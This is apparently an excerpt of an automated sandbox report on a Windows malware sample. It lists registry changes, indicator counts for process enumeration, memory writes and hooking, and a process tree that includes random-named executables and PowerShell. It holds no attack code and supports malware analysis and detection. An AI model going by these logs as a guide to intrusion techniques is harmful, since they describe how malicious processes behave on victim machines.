Key created	\REGISTRY\USER\S-1-5-21-160447019-1232603106-4168707212-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\5	chrome.exe
Key created	\REGISTRY\USER\S-1-5-21-160447019-1232603106-4168707212-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}	chrome.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-160447019-1232603106-4168707212-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Mode = "4"	chrome.exe
Key created	\REGISTRY\USER\S-1-5-21-160447019-1232603106-4168707212-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\1\0\0	chrome.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-160447019-1232603106-4168707212-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\6\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Sort = 000000000000000000000000000000000100000030f125b7ef471a10a5f102608c9eebac0a00000001000000	chrome.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-160447019-1232603106-4168707212-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\7\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByDirection = "1"	chrome.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-160447019-1232603106-4168707212-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\1\0\NodeSlot = "6"	chrome.exe
Key created	\REGISTRY\USER\S-1-5-21-160447019-1232603106-4168707212-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell	chrome.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-160447019-1232603106-4168707212-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4\Shell\KnownFolderDerivedFolderType = "{57807898-8C4F-4462-BB63-71042380B109}"	chrome.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-160447019-1232603106-4168707212-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1 = 3a001f44471a0359723fa74489c55595fe6b30ee260001002600efbe10000000f8f57ce98986da01977fac3b9086da01977fac3b9086da0114000000	chrome.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-160447019-1232603106-4168707212-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\6\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByDirection = "1"	chrome.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-160447019-1232603106-4168707212-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\6\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\FFlags = "1"	chrome.exe
Key created	\REGISTRY\USER\S-1-5-21-160447019-1232603106-4168707212-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\7\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}	chrome.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-160447019-1232603106-4168707212-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\5\ComDlg\{CD0FC69B-71E2-46E5-9690-5BCD9F57AAB3}\GroupByKey:PID = "0"	chrome.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-160447019-1232603106-4168707212-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\LogicalViewMode = "1"	chrome.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-160447019-1232603106-4168707212-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByKey:PID = "0"	chrome.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-160447019-1232603106-4168707212-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\7\Shell\KnownFolderDerivedFolderType = "{57807898-8C4F-4462-BB63-71042380B109}"	chrome.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-160447019-1232603106-4168707212-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\5\ComDlg\{CD0FC69B-71E2-46E5-9690-5BCD9F57AAB3}\FFlags = "1092616257"	chrome.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-160447019-1232603106-4168707212-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\1\0\0\NodeSlot = "7"	chrome.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-160447019-1232603106-4168707212-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\7\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\FFlags = "1092616257"	chrome.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-160447019-1232603106-4168707212-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\5\ComDlg\{CD0FC69B-71E2-46E5-9690-5BCD9F57AAB3}\Mode = "1"	chrome.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-160447019-1232603106-4168707212-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\6\Shell\KnownFolderDerivedFolderType = "{57807898-8C4F-4462-BB63-71042380B109}"	chrome.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-160447019-1232603106-4168707212-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\IconSize = "16"	chrome.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-160447019-1232603106-4168707212-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\6\Shell\SniffedFolderType = "Generic"	chrome.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-160447019-1232603106-4168707212-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\6\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\LogicalViewMode = "1"	chrome.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-160447019-1232603106-4168707212-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\6\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\ColInfo = 00000000000000000000000000000000fddfdffd100000000000000000000000040000001800000030f125b7ef471a10a5f102608c9eebac0a0000001001000030f125b7ef471a10a5f102608c9eebac0e0000007800000030f125b7ef471a10a5f102608c9eebac040000007800000030f125b7ef471a10a5f102608c9eebac0c00000050000000	chrome.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-160447019-1232603106-4168707212-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\MRUListEx = ffffffff	chrome.exe
Key created	\REGISTRY\USER\S-1-5-21-160447019-1232603106-4168707212-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\5\ComDlg\{CD0FC69B-71E2-46E5-9690-5BCD9F57AAB3}	chrome.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-160447019-1232603106-4168707212-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\7\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupView = "0"	chrome.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-160447019-1232603106-4168707212-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\FFlags = "1092616257"	chrome.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-160447019-1232603106-4168707212-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByDirection = "1"	chrome.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-160447019-1232603106-4168707212-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\7\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\LogicalViewMode = "1"	chrome.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-160447019-1232603106-4168707212-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\7\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\IconSize = "16"	chrome.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\Instance	chrome.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-160447019-1232603106-4168707212-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\1\MRUListEx = 00000000ffffffff	chrome.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-160447019-1232603106-4168707212-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\6\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupView = "0"	chrome.exe
Key created	\REGISTRY\USER\S-1-5-21-160447019-1232603106-4168707212-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\0\0	chrome.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-160447019-1232603106-4168707212-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\1\NodeSlot = "4"	chrome.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-160447019-1232603106-4168707212-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 02020202	chrome.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-160447019-1232603106-4168707212-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\NodeSlot = "5"	chrome.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-160447019-1232603106-4168707212-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 020202	chrome.exe
Key created	\REGISTRY\USER\S-1-5-21-160447019-1232603106-4168707212-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\0	chrome.exe
Key created	\REGISTRY\USER\S-1-5-21-160447019-1232603106-4168707212-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\7	chrome.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-160447019-1232603106-4168707212-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\6\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\IconSize = "16"	chrome.exe
Key created	\REGISTRY\USER\S-1-5-21-160447019-1232603106-4168707212-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags	chrome.exe
Key created	\REGISTRY\USER\S-1-5-21-160447019-1232603106-4168707212-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1	chrome.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-160447019-1232603106-4168707212-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\5\ComDlg\{CD0FC69B-71E2-46E5-9690-5BCD9F57AAB3}\Sort = 000000000000000000000000000000000100000030f125b7ef471a10a5f102608c9eebac0a00000001000000	chrome.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-160447019-1232603106-4168707212-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = 0000000001000000ffffffff	chrome.exe
Key created	\REGISTRY\USER\S-1-5-21-160447019-1232603106-4168707212-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0	chrome.exe
Key created	\REGISTRY\USER\S-1-5-21-160447019-1232603106-4168707212-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4\Shell	chrome.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-160447019-1232603106-4168707212-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4\Shell\SniffedFolderType = "Generic"	chrome.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-160447019-1232603106-4168707212-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\6\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Mode = "4"	chrome.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-160447019-1232603106-4168707212-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\7\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Mode = "4"	chrome.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

chrome.exechrome.exejhi_service.exekanilzbpgdul.exeMicrosoftEdgeUpdater.exepowershell.exesvchost.exedialer.exefdjrmaypnxal.exepowershell.exe

pid	process
4704	chrome.exe
4704	chrome.exe
1424	chrome.exe
1424	chrome.exe
1808	jhi_service.exe
1808	jhi_service.exe
1808	jhi_service.exe
1808	jhi_service.exe
1808	jhi_service.exe
1808	jhi_service.exe
1808	jhi_service.exe
1808	jhi_service.exe
3868	kanilzbpgdul.exe
3868	kanilzbpgdul.exe
3868	kanilzbpgdul.exe
3868	kanilzbpgdul.exe
3868	kanilzbpgdul.exe
3868	kanilzbpgdul.exe
4824	MicrosoftEdgeUpdater.exe
992	powershell.exe
992	powershell.exe
992	powershell.exe
1736	svchost.exe
1736	svchost.exe
4824	MicrosoftEdgeUpdater.exe
4824	MicrosoftEdgeUpdater.exe
4824	MicrosoftEdgeUpdater.exe
4824	MicrosoftEdgeUpdater.exe
4824	MicrosoftEdgeUpdater.exe
4824	MicrosoftEdgeUpdater.exe
4824	MicrosoftEdgeUpdater.exe
4824	MicrosoftEdgeUpdater.exe
4824	MicrosoftEdgeUpdater.exe
4824	MicrosoftEdgeUpdater.exe
4824	MicrosoftEdgeUpdater.exe
4824	MicrosoftEdgeUpdater.exe
3036	dialer.exe
3036	dialer.exe
3036	dialer.exe
3036	dialer.exe
3036	dialer.exe
3036	dialer.exe
3036	dialer.exe
4824	MicrosoftEdgeUpdater.exe
4824	MicrosoftEdgeUpdater.exe
4824	MicrosoftEdgeUpdater.exe
3036	dialer.exe
3036	dialer.exe
1736	svchost.exe
1736	svchost.exe
6136	fdjrmaypnxal.exe
3036	dialer.exe
3036	dialer.exe
3036	dialer.exe
3036	dialer.exe
3036	dialer.exe
3036	dialer.exe
3036	dialer.exe
3036	dialer.exe
4508	powershell.exe
4508	powershell.exe
3036	dialer.exe
3036	dialer.exe
3036	dialer.exe

Suspicious behavior: GetForegroundWindowSpam 2 IoCs

Processes:

chrome.exeExplorer.EXE

pid process

5204 chrome.exe
3340 Explorer.EXE

pid	process
5204	chrome.exe
3340	Explorer.EXE

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 22 IoCs

Processes:

chrome.exe

pid	process
4704	chrome.exe
4704	chrome.exe
4704	chrome.exe
4704	chrome.exe
4704	chrome.exe
4704	chrome.exe
4704	chrome.exe
4704	chrome.exe
4704	chrome.exe
4704	chrome.exe
4704	chrome.exe
4704	chrome.exe
4704	chrome.exe
4704	chrome.exe
4704	chrome.exe
4704	chrome.exe
4704	chrome.exe
4704	chrome.exe
4704	chrome.exe
4704	chrome.exe
4704	chrome.exe
4704	chrome.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

Processes:

chrome.exe

description	pid	process
Token: SeShutdownPrivilege	4704	chrome.exe
Token: SeCreatePagefilePrivilege	4704	chrome.exe
Token: SeShutdownPrivilege	4704	chrome.exe
Token: SeCreatePagefilePrivilege	4704	chrome.exe
Token: SeShutdownPrivilege	4704	chrome.exe
Token: SeCreatePagefilePrivilege	4704	chrome.exe
Token: SeShutdownPrivilege	4704	chrome.exe
Token: SeCreatePagefilePrivilege	4704	chrome.exe
Token: SeShutdownPrivilege	4704	chrome.exe
Token: SeCreatePagefilePrivilege	4704	chrome.exe
Token: SeShutdownPrivilege	4704	chrome.exe
Token: SeCreatePagefilePrivilege	4704	chrome.exe
Token: SeShutdownPrivilege	4704	chrome.exe
Token: SeCreatePagefilePrivilege	4704	chrome.exe
Token: SeShutdownPrivilege	4704	chrome.exe
Token: SeCreatePagefilePrivilege	4704	chrome.exe
Token: SeShutdownPrivilege	4704	chrome.exe
Token: SeCreatePagefilePrivilege	4704	chrome.exe
Token: SeShutdownPrivilege	4704	chrome.exe
Token: SeCreatePagefilePrivilege	4704	chrome.exe
Token: SeShutdownPrivilege	4704	chrome.exe
Token: SeCreatePagefilePrivilege	4704	chrome.exe
Token: SeShutdownPrivilege	4704	chrome.exe
Token: SeCreatePagefilePrivilege	4704	chrome.exe
Token: SeShutdownPrivilege	4704	chrome.exe
Token: SeCreatePagefilePrivilege	4704	chrome.exe
Token: SeShutdownPrivilege	4704	chrome.exe
Token: SeCreatePagefilePrivilege	4704	chrome.exe
Token: SeShutdownPrivilege	4704	chrome.exe
Token: SeCreatePagefilePrivilege	4704	chrome.exe
Token: SeShutdownPrivilege	4704	chrome.exe
Token: SeCreatePagefilePrivilege	4704	chrome.exe
Token: SeShutdownPrivilege	4704	chrome.exe
Token: SeCreatePagefilePrivilege	4704	chrome.exe
Token: SeShutdownPrivilege	4704	chrome.exe
Token: SeCreatePagefilePrivilege	4704	chrome.exe
Token: SeShutdownPrivilege	4704	chrome.exe
Token: SeCreatePagefilePrivilege	4704	chrome.exe
Token: SeShutdownPrivilege	4704	chrome.exe
Token: SeCreatePagefilePrivilege	4704	chrome.exe
Token: SeShutdownPrivilege	4704	chrome.exe
Token: SeCreatePagefilePrivilege	4704	chrome.exe
Token: SeShutdownPrivilege	4704	chrome.exe
Token: SeCreatePagefilePrivilege	4704	chrome.exe
Token: SeShutdownPrivilege	4704	chrome.exe
Token: SeCreatePagefilePrivilege	4704	chrome.exe
Token: SeShutdownPrivilege	4704	chrome.exe
Token: SeCreatePagefilePrivilege	4704	chrome.exe
Token: SeShutdownPrivilege	4704	chrome.exe
Token: SeCreatePagefilePrivilege	4704	chrome.exe
Token: SeShutdownPrivilege	4704	chrome.exe
Token: SeCreatePagefilePrivilege	4704	chrome.exe
Token: SeShutdownPrivilege	4704	chrome.exe
Token: SeCreatePagefilePrivilege	4704	chrome.exe
Token: SeShutdownPrivilege	4704	chrome.exe
Token: SeCreatePagefilePrivilege	4704	chrome.exe
Token: SeShutdownPrivilege	4704	chrome.exe
Token: SeCreatePagefilePrivilege	4704	chrome.exe
Token: SeShutdownPrivilege	4704	chrome.exe
Token: SeCreatePagefilePrivilege	4704	chrome.exe
Token: SeShutdownPrivilege	4704	chrome.exe
Token: SeCreatePagefilePrivilege	4704	chrome.exe
Token: SeShutdownPrivilege	4704	chrome.exe
Token: SeCreatePagefilePrivilege	4704	chrome.exe

Suspicious use of FindShellTrayWindow 56 IoCs

Processes:

chrome.exe7zG.exedwm.exe

pid	process
4704	chrome.exe
4704	chrome.exe
4704	chrome.exe
4704	chrome.exe
4704	chrome.exe
4704	chrome.exe
4704	chrome.exe
4704	chrome.exe
4704	chrome.exe
4704	chrome.exe
4704	chrome.exe
4704	chrome.exe
4704	chrome.exe
4704	chrome.exe
4704	chrome.exe
4704	chrome.exe
4704	chrome.exe
4704	chrome.exe
4704	chrome.exe
4704	chrome.exe
4704	chrome.exe
4704	chrome.exe
4704	chrome.exe
4704	chrome.exe
4704	chrome.exe
4704	chrome.exe
4704	chrome.exe
4704	chrome.exe
4704	chrome.exe
4704	chrome.exe
4704	chrome.exe
4704	chrome.exe
4704	chrome.exe
4704	chrome.exe
4704	chrome.exe
4704	chrome.exe
4704	chrome.exe
4704	chrome.exe
4704	chrome.exe
4704	chrome.exe
4704	chrome.exe
68	7zG.exe
996	dwm.exe
996	dwm.exe
4704	chrome.exe
4704	chrome.exe
996	dwm.exe
996	dwm.exe
996	dwm.exe
996	dwm.exe
996	dwm.exe
996	dwm.exe
996	dwm.exe
996	dwm.exe
996	dwm.exe
996	dwm.exe

Suspicious use of SendNotifyMessage 26 IoCs

Processes:

chrome.exe

pid	process
4704	chrome.exe
4704	chrome.exe
4704	chrome.exe
4704	chrome.exe
4704	chrome.exe
4704	chrome.exe
4704	chrome.exe
4704	chrome.exe
4704	chrome.exe
4704	chrome.exe
4704	chrome.exe
4704	chrome.exe
4704	chrome.exe
4704	chrome.exe
4704	chrome.exe
4704	chrome.exe
4704	chrome.exe
4704	chrome.exe
4704	chrome.exe
4704	chrome.exe
4704	chrome.exe
4704	chrome.exe
4704	chrome.exe
4704	chrome.exe
4704	chrome.exe
4704	chrome.exe

Suspicious use of SetWindowsHookEx 14 IoCs

Processes:

Conhost.exeConhost.exeConhost.exeConhost.exeConhost.exeConhost.exeConhost.exeConhost.exechrome.exeExplorer.EXE

pid	process
5492	Conhost.exe
4280	Conhost.exe
2988	Conhost.exe
5960	Conhost.exe
5992	Conhost.exe
5868	Conhost.exe
2068	Conhost.exe
5932	Conhost.exe
5204	chrome.exe
3340	Explorer.EXE
3340	Explorer.EXE
3340	Explorer.EXE
3340	Explorer.EXE
3340	Explorer.EXE

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

chrome.exe

description	pid	process	target process
PID 4704 wrote to memory of 4568	4704	chrome.exe	chrome.exe
PID 4704 wrote to memory of 4568	4704	chrome.exe	chrome.exe
PID 4704 wrote to memory of 1836	4704	chrome.exe	chrome.exe
PID 4704 wrote to memory of 1836	4704	chrome.exe	chrome.exe
PID 4704 wrote to memory of 1836	4704	chrome.exe	chrome.exe
PID 4704 wrote to memory of 1836	4704	chrome.exe	chrome.exe
PID 4704 wrote to memory of 1836	4704	chrome.exe	chrome.exe
PID 4704 wrote to memory of 1836	4704	chrome.exe	chrome.exe
PID 4704 wrote to memory of 1836	4704	chrome.exe	chrome.exe
PID 4704 wrote to memory of 1836	4704	chrome.exe	chrome.exe
PID 4704 wrote to memory of 1836	4704	chrome.exe	chrome.exe
PID 4704 wrote to memory of 1836	4704	chrome.exe	chrome.exe
PID 4704 wrote to memory of 1836	4704	chrome.exe	chrome.exe
PID 4704 wrote to memory of 1836	4704	chrome.exe	chrome.exe
PID 4704 wrote to memory of 1836	4704	chrome.exe	chrome.exe
PID 4704 wrote to memory of 1836	4704	chrome.exe	chrome.exe
PID 4704 wrote to memory of 1836	4704	chrome.exe	chrome.exe
PID 4704 wrote to memory of 1836	4704	chrome.exe	chrome.exe
PID 4704 wrote to memory of 1836	4704	chrome.exe	chrome.exe
PID 4704 wrote to memory of 1836	4704	chrome.exe	chrome.exe
PID 4704 wrote to memory of 1836	4704	chrome.exe	chrome.exe
PID 4704 wrote to memory of 1836	4704	chrome.exe	chrome.exe
PID 4704 wrote to memory of 1836	4704	chrome.exe	chrome.exe
PID 4704 wrote to memory of 1836	4704	chrome.exe	chrome.exe
PID 4704 wrote to memory of 1836	4704	chrome.exe	chrome.exe
PID 4704 wrote to memory of 1836	4704	chrome.exe	chrome.exe
PID 4704 wrote to memory of 1836	4704	chrome.exe	chrome.exe
PID 4704 wrote to memory of 1836	4704	chrome.exe	chrome.exe
PID 4704 wrote to memory of 1836	4704	chrome.exe	chrome.exe
PID 4704 wrote to memory of 1836	4704	chrome.exe	chrome.exe
PID 4704 wrote to memory of 1836	4704	chrome.exe	chrome.exe
PID 4704 wrote to memory of 1836	4704	chrome.exe	chrome.exe
PID 4704 wrote to memory of 1836	4704	chrome.exe	chrome.exe
PID 4704 wrote to memory of 1836	4704	chrome.exe	chrome.exe
PID 4704 wrote to memory of 1836	4704	chrome.exe	chrome.exe
PID 4704 wrote to memory of 1836	4704	chrome.exe	chrome.exe
PID 4704 wrote to memory of 1836	4704	chrome.exe	chrome.exe
PID 4704 wrote to memory of 1836	4704	chrome.exe	chrome.exe
PID 4704 wrote to memory of 1836	4704	chrome.exe	chrome.exe
PID 4704 wrote to memory of 1836	4704	chrome.exe	chrome.exe
PID 4704 wrote to memory of 1512	4704	chrome.exe	chrome.exe
PID 4704 wrote to memory of 1512	4704	chrome.exe	chrome.exe
PID 4704 wrote to memory of 4632	4704	chrome.exe	chrome.exe
PID 4704 wrote to memory of 4632	4704	chrome.exe	chrome.exe
PID 4704 wrote to memory of 4632	4704	chrome.exe	chrome.exe
PID 4704 wrote to memory of 4632	4704	chrome.exe	chrome.exe
PID 4704 wrote to memory of 4632	4704	chrome.exe	chrome.exe
PID 4704 wrote to memory of 4632	4704	chrome.exe	chrome.exe
PID 4704 wrote to memory of 4632	4704	chrome.exe	chrome.exe
PID 4704 wrote to memory of 4632	4704	chrome.exe	chrome.exe
PID 4704 wrote to memory of 4632	4704	chrome.exe	chrome.exe
PID 4704 wrote to memory of 4632	4704	chrome.exe	chrome.exe
PID 4704 wrote to memory of 4632	4704	chrome.exe	chrome.exe
PID 4704 wrote to memory of 4632	4704	chrome.exe	chrome.exe
PID 4704 wrote to memory of 4632	4704	chrome.exe	chrome.exe
PID 4704 wrote to memory of 4632	4704	chrome.exe	chrome.exe
PID 4704 wrote to memory of 4632	4704	chrome.exe	chrome.exe
PID 4704 wrote to memory of 4632	4704	chrome.exe	chrome.exe
PID 4704 wrote to memory of 4632	4704	chrome.exe	chrome.exe
PID 4704 wrote to memory of 4632	4704	chrome.exe	chrome.exe
PID 4704 wrote to memory of 4632	4704	chrome.exe	chrome.exe
PID 4704 wrote to memory of 4632	4704	chrome.exe	chrome.exe
PID 4704 wrote to memory of 4632	4704	chrome.exe	chrome.exe
PID 4704 wrote to memory of 4632	4704	chrome.exe	chrome.exe

C:\Windows\system32\winlogon.exe
winlogon.exe
1⤵
PID:588

C:\Windows\system32\dwm.exe
"dwm.exe"
2⤵
- Suspicious use of FindShellTrayWindow
PID:996

C:\Windows\system32\lsass.exe
C:\Windows\system32\lsass.exe
1⤵
- Modifies data under HKEY_USERS
PID:640

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k dcomlaunch -s PlugPlay
1⤵
PID:736

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k dcomlaunch -s LSM
1⤵
PID:900

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k localservicenetworkrestricted -s lmhosts
1⤵
PID:440

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s NcbService
1⤵
PID:580

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k localservicenetworkrestricted -s EventLog
1⤵
PID:1044

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s Schedule
1⤵
PID:1136

c:\windows\system32\taskhostw.exe
taskhostw.exe {222A245B-E637-4AE9-A93F-A59CA119A75E}
2⤵
PID:3124

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s ProfSvc
1⤵
PID:1168

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s Themes
1⤵
PID:1176

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k localservice -s EventSystem
1⤵
PID:1184

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k localservice -s nsi
1⤵
PID:1192

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k localservicenetworkrestricted -s Dhcp
1⤵
PID:1388

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s UserManager
1⤵
PID:1408

c:\windows\system32\sihost.exe
sihost.exe
2⤵
PID:3012

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s SENS
1⤵
PID:1436

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s AudioEndpointBuilder
1⤵
PID:1524

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k networkservice -s NlaSvc
1⤵
PID:1532

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k networkservice -s Dnscache
1⤵
PID:1576

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted
1⤵
PID:1656

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted
1⤵
PID:1780

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k localservice -s netprofm
1⤵
PID:1792

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted
1⤵
PID:1800

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k appmodel -s StateRepository
1⤵
PID:1844

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s ShellHWDetection
1⤵
PID:1880

C:\Windows\System32\spoolsv.exe
C:\Windows\System32\spoolsv.exe
1⤵
PID:1984

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k networkservice -s LanmanWorkstation
1⤵
PID:1272

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s IKEEXT
1⤵
PID:2184

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k networkservicenetworkrestricted -s PolicyAgent
1⤵
PID:2192

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s LanmanServer
1⤵
PID:2220

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k networkservice -s CryptSvc
1⤵
PID:2272

C:\Windows\sysmon.exe
C:\Windows\sysmon.exe
1⤵
PID:2292

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k appmodel -s tiledatamodelsvc
1⤵
PID:2316

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s TrkWks
1⤵
PID:2332

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s Winmgmt
1⤵
PID:2352

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s WpnService
1⤵
PID:2384

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s Browser
1⤵
PID:2804

C:\Windows\system32\wbem\unsecapp.exe
